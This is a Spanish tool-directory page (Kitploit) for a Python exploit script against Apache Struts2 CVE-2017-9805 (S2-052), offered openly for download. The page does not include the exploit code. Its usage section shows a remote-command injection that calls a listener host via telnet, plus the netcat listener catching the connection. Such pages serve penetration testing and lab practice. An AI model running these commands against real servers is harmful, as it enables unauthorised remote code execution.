Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
-CVE-2017-9805 — Script de explotación para Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805) | Kitploit
Herramientas/GitHubGitHub/0x00-0x00/-cve-2017-9805
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHub0x00-0x00/-cve-2017-9805

-CVE-2017-9805

Script de explotación para Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)

Ver Repositorio
1513hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Información de vulnerabilidad

Recursos: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

¿Qué es esto?

Un script de exploit en Python capaz de ejecutar comandos remotos en el shell de un sistema que aloja un Struts2 vulnerable a S2-052.

Uso

╭─root@blackshell ~/
╰─# python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

root@kitploit:~
[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.

╭─zc00l@blackshell ~/
╰─$ nc -lvp 1234

root@kitploit:~
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned

Probado en la máquina vulnerable de pentesterlab del ejercicio s2-052.

Derechos de autor

Este script de exploit fue escrito por mí (zc00l) y puede ser usado por cualquiera.

En caso de que quieras usar o modificar este script, por favor da los créditos apropiados por cualquier trabajo ya realizado.

Descargar herramienta